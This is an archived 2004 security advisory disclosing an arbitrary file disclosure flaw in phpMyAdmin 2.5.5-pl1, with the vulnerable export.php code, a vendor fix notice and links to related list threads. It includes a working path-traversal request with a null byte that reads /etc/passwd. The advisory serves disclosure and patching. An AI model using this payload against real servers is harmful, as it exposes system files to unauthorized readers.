Arbitrary File Disclosure Vulnerability in phpMyAdmin 2.5.5-pl1 and prior

From: Cedric Cochin (cco_at_netvigilance.com)
Date: 02/03/04

  • Next message: Joseph S. Myers: "Re: Symlink Vulnerability in GNU libtool <1.5.2"
    Date: Tue, 3 Feb 2004 11:28:57 +0100
    To: submissions@packetstormsecurity.org, vuln@secunia.com, news@securiteam.com, bugtraq@securityfocus.com, bugs@securitytracker.com
    
    

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

       Arbitrary File Disclosure Vulnerability in phpMyAdmin 2.5.5-pl1 and prior

    ################################################################################
    Summary :

    phpMyAdmin is a tool written in PHP intended to handle the administration of
    MySQL over the WWW. There is a vulnerability in the current stable version of
    phpMyAdmin that allows an attacker to retrieve arbitrary files from the
    webserver with privileges of the webserver..

    ################################################################################
    Details :

    The export PHP script can be exploited to disclose arbitrary file using a
    include() PHP call.

    Vulnerable Systems:
    * phpMyAdmin 2.5.5-pl1 and prior

    Release Date :
    February 2, 2004

    Severity :
    HIGH

    ################################################################################
    Examples :

                      -------------------------------------------

    I - Arbitrary File Disclosure
    (HIGH Risk)

    File impacted : export.php

    14:// What type of export are we doing?
    15:if ($what == 'excel') {
    16: $type = 'csv';
    17:} else {
    18: $type = $what;
    19:}
    20:
    21:/**
    22: * Defines the url to return to in case of error in a sql statement
    23: */
    24:require('./libraries/export/' . $type . '.php');

    Exploit example:

    - -- HTTP Request --

    http://[target]/[phpMyAdmin_directory]/export.php?what=../../../../../../etc/passwd%00

    - -- HTTP Request --

    The vulnerability is available evenif PHP register_globals is set to off.

    ################################################################################
    Vendor Status :

    The information has been provided to the phpMyAdmin Project Managers.
    A new release candidate 2.5.6-rc1 with fixes for this vulnerability is available.
    - --> http://www.phpmyadmin.net/home_page/
    - --> http://www.phpmyadmin.net/home_page/relnotes.php?rel=0

    ################################################################################
    Credit :

    Cedric Cochin, Security Engineer, netVigilance, Inc. (www.netvigilance.com)
    < cco@netvigilance.com >

    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.0.6 (GNU/Linux)
    Comment: For info see http://www.gnupg.org

    iD8DBQFAH3dJA9/8vqmWoYQRAjNoAJ4pGgoQBT9WoyPmbfw4h/6LkcjR6wCeNBj2
    ekO25itz2ssIvwgf2WRb/4k=
    =Yuh1
    -----END PGP SIGNATURE-----


  • Next message: Joseph S. Myers: "Re: Symlink Vulnerability in GNU libtool <1.5.2"

    Relevant Pages

    • Re: phpmyadmin
      ... I just don't really understand what is going on as the same server will serve up other php pages, but phpmyadmin seems only able to serve html pages. ... For example configuration ... Trouble? ...
      (Debian-User)
    • [Full-disclosure] CVE-2008-5557 - PHP mbstring buffer overflow vulnerability
      ... CVE-2008-5557 - PHP mbstring buffer overflow vulnerability ... 4.3.0 and later versions including PHP 5 ... A heap buffer overflow was found in mbstring extension that is ... The vulnerability occurs in the part of the encoding conversion facility ...
      (Full-Disclosure)
    • Re: [Full-disclosure] phpMyAdmin 3.3.5 / 2.11.10 <= Cross Site Scripting (XSS) Vulnerability
      ... arbitrary SQL statements ... via crafted XSS payloads. ... The phpMyAdmin web application was vulnerable to Cross Site Scripting ... VULNERABILITY DESCRIPTION ...
      (Full-Disclosure)
    • Re: phpmyadmin
      ... I just don't really understand what is going on as the same server will serve up other php pages, but phpmyadmin seems only able to serve html pages. ... For example configuration ... Trouble? ...
      (Debian-User)
    • [Full-disclosure] [ MDVSA-2009:324 ] php
      ... Package: php ... Multiple vulnerabilities was discovered and corrected in php: ... before 5.2.9 allows remote attackers to cause a denial of service ... Unspecified vulnerability in PHP before 5.2.11 has unknown impact ...
      (Full-Disclosure)